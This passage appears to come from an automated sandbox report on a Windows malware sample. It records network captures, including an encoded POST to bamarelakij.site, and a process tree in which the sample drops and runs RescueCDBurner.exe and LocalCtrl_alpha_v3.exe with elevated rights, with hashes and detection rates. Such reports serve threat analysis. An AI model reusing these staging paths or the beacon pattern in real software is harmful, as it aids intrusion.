                                                                                                                                                                                                                                                                          2025-01-09 13:56:31 UTC385OUTPOST /roi%2Bheenok-q?l8apqiysnb=GttOiq0vt2GttkhWbMiAXNqw72%2FgYPU4qwYREHq2VUwlx0m1EABn2QgKzPtZ%2BgYf4ERrP0Yx4N8xphIMBdqCuQ%3D%3D HTTP/1.1
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          p: B5smxlJLNo14xsxDJtIvbZCH8YE
                                                                                                                                                                                                                                                                          Content-Length: 35
                                                                                                                                                                                                                                                                          Host: bamarelakij.site
                                                                                                                                                                                                                                                                          2025-01-09 13:56:31 UTC35OUTData Raw: 00 00 00 00 03 00 00 00 fd ff ff ff 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                          2025-01-09 13:56:31 UTC720INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:31 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EdVjF6taWhj4kRfGXpNszP1KU4gyptG2mBYhwMu4rE2QZn6PkPzOy6HCesPmENsr9YnbdXIx3I6xJSMfdjixJGdtJEaUnpecMtEgi5HLJcAv73hw9s2ZMxTxeDUB4qDKMyKG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                                          CF-RAY: 8ff4ee5e6ca6c40c-EWR
                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1570&min_rtt=1566&rtt_var=595&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1056&delivery_rate=1826141&cwnd=221&unsent_bytes=0&cid=79f440b884cab394&ts=307&x=0"


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          34192.168.2.85010223.200.0.384435504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:56:39 UTC430OUTOPTIONS /api/report?cat=msn HTTP/1.1
                                                                                                                                                                                                                                                                          Host: deff.nelreports.net
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Origin: https://assets.msn.com
                                                                                                                                                                                                                                                                          Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                                          Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          2025-01-09 13:56:40 UTC334INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                          Server: Kestrel
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:40 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          PMUSER_FORMAT_QS:
                                                                                                                                                                                                                                                                          X-CDN-TraceId: 0.15ac2d17.1736430999.13b295df
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          35192.168.2.85010323.200.0.384435504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2025-01-09 13:56:41 UTC373OUTPOST /api/report?cat=msn HTTP/1.1
                                                                                                                                                                                                                                                                          Host: deff.nelreports.net
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Content-Length: 485
                                                                                                                                                                                                                                                                          Content-Type: application/reports+json
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                          2025-01-09 13:56:41 UTC485OUTData Raw: 5b 7b 22 61 67 65 22 3a 34 38 33 38 38 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 33 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 33 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6e 74 70 2e 6d 73 6e 2e 63 6f 6d 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 30 31 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 34 2e 32 38 2e 31 39 30 2e 39 31 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 32 30 30 2c 22 74 79 70 65 22 3a 22 6f 6b 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 61 73 73 65
                                                                                                                                                                                                                                                                          Data Ascii: [{"age":48388,"body":{"elapsed_time":130,"method":"GET","phase":"application","protocol":"h3","referrer":"https://ntp.msn.com/","sampling_fraction":0.001,"server_ip":"184.28.190.91","status_code":200,"type":"ok"},"type":"network-error","url":"https://asse
                                                                                                                                                                                                                                                                          2025-01-09 13:56:41 UTC333INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                          Server: Kestrel
                                                                                                                                                                                                                                                                          Date: Thu, 09 Jan 2025 13:56:41 GMT
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          PMUSER_FORMAT_QS:
                                                                                                                                                                                                                                                                          X-CDN-TraceId: 0.17ac2d17.1736431001.3c60527
                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: *
                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: false
                                                                                                                                                                                                                                                                          Access-Control-Allow-Methods: GET, OPTIONS, POST
                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *


                                                                                                                                                                                                                                                                          Statistics

                                                                                                                                                                                                                                                                          CPU Usage

                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          Memory Usage

                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          High Level Behavior Distribution

                                                                                                                                                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                          Behavior

                                                                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                                                                          System Behavior

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                          Start time:08:54:12
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\kXzODlqJak.exe"
                                                                                                                                                                                                                                                                          Imagebase:0x8e0000
                                                                                                                                                                                                                                                                          File size:14'323'584 bytes
                                                                                                                                                                                                                                                                          MD5 hash:AB79EAFCCE0D6EFF856B259977E480E1
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                                          Start time:08:54:13
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Windows\Temp\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\TEMP\{C9FA46BC-21B4-453A-A393-30F0028B8B06}\.cr\kXzODlqJak.exe" -burn.clean.room="C:\Users\user\Desktop\kXzODlqJak.exe" -burn.filehandle.attached=636 -burn.filehandle.self=632
                                                                                                                                                                                                                                                                          Imagebase:0xf20000
                                                                                                                                                                                                                                                                          File size:14'302'064 bytes
                                                                                                                                                                                                                                                                          MD5 hash:2C6652F7E01283DE091B5200B7878E69
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 29%, ReversingLabs
                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                                          Start time:08:54:15
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Windows\Temp\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\TEMP\{6D7D2F34-5437-45AD-8554-8F947CEA8260}\.ba\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          Imagebase:0xa50000
                                                                                                                                                                                                                                                                          File size:6'487'736 bytes
                                                                                                                                                                                                                                                                          MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 3%, ReversingLabs
                                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                                                          Start time:08:54:17
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          Imagebase:0x750000
                                                                                                                                                                                                                                                                          File size:6'487'736 bytes
                                                                                                                                                                                                                                                                          MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 3%, ReversingLabs
                                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                                                          Start time:08:54:18
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          Imagebase:0xa40000
                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                                                          Start time:08:54:18
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                                                          Start time:08:54:43
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                          File size:2'364'728 bytes
                                                                                                                                                                                                                                                                          MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                                                          Start time:08:54:55
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\Remoteservicezoo_test\RescueCDBurner.exe"
                                                                                                                                                                                                                                                                          Imagebase:0x750000
                                                                                                                                                                                                                                                                          File size:6'487'736 bytes
                                                                                                                                                                                                                                                                          MD5 hash:11C8962675B6D535C018A63BE0821E4C
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                                          Start time:08:54:56
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          Imagebase:0xa40000
                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:12
                                                                                                                                                                                                                                                                          Start time:08:54:56
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff6ee680000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                                                          Start time:08:55:15
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                                                                                                                                          Imagebase:0x140000000
                                                                                                                                                                                                                                                                          File size:2'364'728 bytes
                                                                                                                                                                                                                                                                          MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:16
                                                                                                                                                                                                                                                                          Start time:08:55:34
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                                                          Start time:08:55:35
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:18
                                                                                                                                                                                                                                                                          Start time:08:55:35
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2096,i,8130310607339759399,8200688204715788640,262144 /prefetch:3
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:19
                                                                                                                                                                                                                                                                          Start time:08:55:35
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2772 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:3
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:25
                                                                                                                                                                                                                                                                          Start time:08:55:41
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=7120 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:26
                                                                                                                                                                                                                                                                          Start time:08:55:41
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=7172 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          General

                                                                                                                                                                                                                                                                          Target ID:29
                                                                                                                                                                                                                                                                          Start time:08:56:35
                                                                                                                                                                                                                                                                          Start date:09/01/2025
                                                                                                                                                                                                                                                                          Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=7288 --field-trial-handle=2616,i,14830091193181995039,2472633763164923008,262144 /prefetch:8
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7f97c0000
                                                                                                                                                                                                                                                                          File size:4'210'216 bytes
                                                                                                                                                                                                                                                                          MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                                                          Disassembly

                                                                                                                                                                                                                                                                          Reset < >

                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                            Execution Coverage:4.7%
                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                            Signature Coverage:8.8%
                                                                                                                                                                                                                                                                            Total number of Nodes:1875
                                                                                                                                                                                                                                                                            Total number of Limit Nodes:44
